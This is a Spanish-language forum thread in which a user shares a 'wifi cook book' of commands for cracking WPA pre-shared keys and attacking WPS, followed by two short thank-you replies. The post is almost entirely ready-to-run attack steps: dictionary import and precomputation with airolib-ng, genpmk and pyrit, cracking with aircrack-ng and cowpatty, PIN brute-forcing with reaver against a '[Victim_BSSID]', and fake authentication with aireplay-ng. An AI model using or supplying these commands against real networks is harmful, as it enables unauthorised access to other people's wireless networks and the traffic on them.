wifi cook book

Iniciado por TeNeX, Febrero 07, 2013, 08:40:53 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Les traigo este aporte, es una recopilación que hice de varios ataques, procesamiento/generación de diccionarios  etc

Cracking WPA
* test with wireshark all your networks around with this filter
wps.wifi_protected_setup_state == 2

# airmon-ng start wlan0
# wireshark mon0&

Importar diccionario para WPA con airolib-ng
airolib-ng [db_name] [option [param]]

#airolib-ng crackwpa --import passwd /ruta/del/diccionario.txt
#airolib-ng crackwpa --import essid /archivo/con/el/essid
#airolib-ng crackwpa --stats
#airolib-ng crackwpa --clean all
#airolib-ng crackwpa --batch
#airolib-ng crackwpa --verify all
#aircrack-ng -r crackwpa archivo.cap

Cowpatty
*si el essid contiene espacios va entre comillas
*para hashear un diccionario se usa genpmk

#cowpatty -s [ESSID] -r archivo.cap -f /ruta/del/diccionario.txt
#cowpatty -s [ESSID] -r wpa.cap -d /ruta/del/diccionario/hasheado

Genpmk
*Generar el diccionario precomputado (hashes) para cowpatty, pyrt, etc
*Tener en cuenta que el argumento de -d podría no existir y se generaría

#genpmk -s [ESSID] -d /ruta/del/diccionario_en_Hash -f diccionario.txt
#genpmk -s [ESSID] -d [SSID] -f diccionario.txt

***Probar Contraseña***

# wpa_passphrase [ESSID] [password] > wpa.conf
# wpa_supplicant -Dwext -iwlan0 -c /ruta/del/wpa.conf

Pyrt

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt
#pyrt -e [essid] create_essid
#pyrt -f [diccionario.txt] import_passwords
#pyrt batchprocess
#aircrack-ng -w dict.txt file.cap
#airolib-ng testdb -import essid [essid]
#pyrt -e [essid] -f testdb export_hashdb
#aircrack-ng -r testdb file.cap


***DICCIONARIOS***

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt


pyrt -e [essid] -f [dictionary.txt] passthrough | cowpatty -d - -r [file.cap]

-s [essid]

Reaver

*To use reaver you need to check if victim has wps enabled and is chiper with

wpa
*then enable monitor mode and with mon0 or your new interface sniff with

wireshark and set filter to: wps.wifi_protected_setup_state == 2
*Then you got the victims with wps vuln
*Source: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

# airmon-ng start wlan0
# airodump mon0  <- to find target
# reaver -i mon0 -b [Victim_BSSID] -vv


Fakeauth

# aireplay-ng --fakeauth 10 -e [ESSID]  mon0
# aireplay-ng --fakeauth 10 -e [ESSID] -h [my mac or Spoofed_MAC_ADDRESS] mon0

Si se captura un xor packet

# airodump-ng --channel 1 mon0 --bssid [AP_Victim_MAC] --write [name.cap]
# aireplay-ng --fakeauth 10 mon0 -e [ESSID] -y [FILE.XOR]

Muy buen aporte, gracias por compartirlo.  :)

Saludos

:) gracias, me tarde un ratito en hacer esta recopilación pero me da gústo saber que si les agrada, estoy buscando la que hice de sqli para sharearla